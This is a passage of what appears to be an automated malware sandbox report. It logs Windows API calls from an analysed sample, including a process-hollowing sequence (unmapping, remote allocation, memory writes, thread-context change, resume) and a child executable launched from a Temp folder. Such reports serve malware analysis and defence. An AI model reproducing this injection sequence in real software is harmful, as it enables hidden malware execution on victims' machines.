[297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.706] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0108.706] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0108.707] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0108.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x1d47e0*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d47e0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x1d4be0, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0108.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x1d4be0*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d4be0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.714] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x2291e0*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2291e0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.714] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1d4914*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d4914*, lpNumberOfBytesWritten=0x0) returned 1 [0108.714] SetThreadContext (hThread=0x48, lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.714] ResumeThread (hThread=0x48) returned 0x1 [0108.714] CloseHandle (hObject=0x48) returned 1 [0108.714] CloseHandle (hObject=0x4c) returned 1 [0108.715] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.715] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0108.715] ExitProcess (uExitCode=0x0) Process: id = "33" image_name = "wtsk8wxh.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe" page_root = "0x7ea168c0" os_pid = "0xcb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xca4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5014 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5015 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5016 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 5017 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5018 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5019 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5020 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5021 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 5022 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5059 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5060 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5061 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 5062 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5063 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5064 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5065 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5066 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5067 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5068 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5069 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5070 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5071 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5072 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5073 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5074 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5075 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5076 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5077 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5078 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5079 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5080 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5081 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5082 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5083 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 5084 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 5085 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 5086 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5087 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5088 start_va = 0x1440000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 5133 start_va = 0x14e0000 end_va = 0x17aefff entry_point = 0x14e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5134 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 5135 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5240 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 5241 start_va = 0x17b0000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 5242 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5243 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5244 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5245 start_va = 0x230000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 5246 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5247 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5291 start_va = 0x18b0000 end_va = 0x19affff entry_point = 0x0 region_type = private name = "private_0x00000000018b0000" filename = "" Region: id = 5292 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5293 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 51 os_tid = 0xcb8 [0108.372] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.373] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0108.374] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 